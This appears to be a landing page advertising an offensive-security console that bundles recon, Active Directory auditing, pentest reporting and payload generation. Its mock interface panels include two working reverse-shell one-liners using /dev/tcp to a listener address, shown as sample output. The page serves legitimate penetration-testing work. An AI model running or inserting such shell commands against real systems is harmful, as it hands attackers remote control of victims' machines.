Logo
Get Started

Offensive security toolkit, unified.

OffSec Labs hosts critical security apps—including reconnaissance suites, AD auditors, and report builders—unified under a single login. Execute actions, audit infrastructures, and generate reports from one calm, powerful console.

Start Free Explore Modular Apps
OffSec Command Console
SSO Connected Console v1.0
Modular Workspace All services running
🔍 Recon Suite

Subdomain scanners, crawler engines, and DNS monitors.

📝 OffSec Reporting

Professional pentesting reporting system with CVSS calculators.

Modular apps, one workspace

Enable what you need, leave out what you don't. All tools hook into your account under a single credentials database.

Reconnaissance Suite

Automate passive subdomain enumeration, DNS mappings, port discovery, and host cataloging.

Active
api.offsec.local
Discovered
dev.offsec.local
test-dc.local
Flagged
admin.offsec.local

Security Reporting

Compile professional pentesting reports using templated layouts and nested CVSS score calculators.

AD Auditor

Audit Windows domains, user delegations, and check for Kerberoasting susceptibility.

Payload Console

Generate and deliver payloads with customizable callback architectures.

1
2
3
4
5
6
7
8
9
10
11
12
13
14

Exploit Research

Validate service vulnerabilities and analyze package security vectors.

Liblzma Backdoor FAIL
Log4j Injection OK
SSH Bruteforce OK

Exploit Database

Quick access to validated proofs-of-concept for common CVE mappings.

CVE-2024-3094 CVE-2021-44228 CVE-2023-3519

Sentinel Detections

Deploy corresponding SIEM detection rules alongside offensive playbooks.

Sysmon Process Creation
LDAP Queries Logged
RDP Pipe Access

Interactive Lab Shells

Connect directly to terminal shells inside our sandboxed simulation domains.

sh -i >& /dev/tcp/10.10.14.2/4444

Technical depth

App Console Modules

Recon Tool

Subdomain & service mapping.

Perform automated recon sweeps, resolve hosts, run passive DNS queries, and detect open ports across entire organizations.

OffSec Reporting

Templated report builder.

Write markdown security advisories, calculate CVSS vectors dynamically, and export clean, executive-ready PDF findings.

AD Auditor

Domain path auditing.

Audit Kerberos settings, extract service accounts (SPNs), track group memberships, and visualize domain trust paths.

Payload Console

Interactive shellcode builders.

Generate customized binary payloads, MSFvenom setups, web shells, and configure multi-handling listeners.

🔍 Recon Sweep Console Status: idle
# Resolved Subdomains:
- [OK] dc01.offsec.local (10.10.11.1)
- [OK] portal.offsec.local (10.10.11.2)
- [OK] git.offsec.local (10.10.11.45)
📝 Report Draft #42 CVSS 9.8
Unauthenticated SQL Injection in Portal

The 'id' parameter in /api/profile suffers from raw string concatenation, permitting administrative user bypass.

Impact: Administrative Account Takeover / RCE
# Extracting SPNs...
sql_service@offsec.local -> MSSQLSvc/db01:1433
http_app@offsec.local -> HTTP/portal.offsec.local

[!] sql_service SPN has weak RC4 encryption.
# Generated reverse shell code:
sh -i >& /dev/tcp/10.10.14.2/9001 0>&1

Ready to consolidate your security tools?

Join other security operators using our modular console as a single, consolidated launchpad.

Consolidate Console Free